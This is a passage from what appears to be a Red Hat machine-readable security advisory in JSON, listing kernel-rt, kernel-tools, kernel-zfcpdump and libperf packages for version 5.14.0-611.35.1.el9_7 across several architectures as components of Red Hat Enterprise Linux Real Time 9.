"name": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
